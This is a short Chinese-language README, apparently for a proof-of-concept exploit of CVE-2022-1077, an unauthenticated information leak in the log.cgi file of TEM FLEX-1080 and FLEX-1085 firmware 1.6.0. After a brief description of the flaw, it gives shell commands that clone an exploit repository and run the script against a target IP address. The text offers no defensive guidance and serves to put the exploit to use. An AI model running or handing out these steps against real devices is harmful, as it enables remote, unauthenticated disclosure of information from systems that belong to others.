在 TEM FLEX-1080 和 FLEX-1085 1.6.0 版本中发现了一个漏洞。该漏洞被认定为存在安全隐患。漏洞位于组件 Log Handler 的 log.cgi 文件中。直接请求会导致硬件信息泄露。攻击可远程发起,且无需任何形式的认证。

$ git clone https://github.com/Brosck/CVE-2022-1077.git
$ cd CVE-2022-1077
$ chmod +x cve-2022-1077.py
$ ./cve-2022-1077.py -u http://<IP>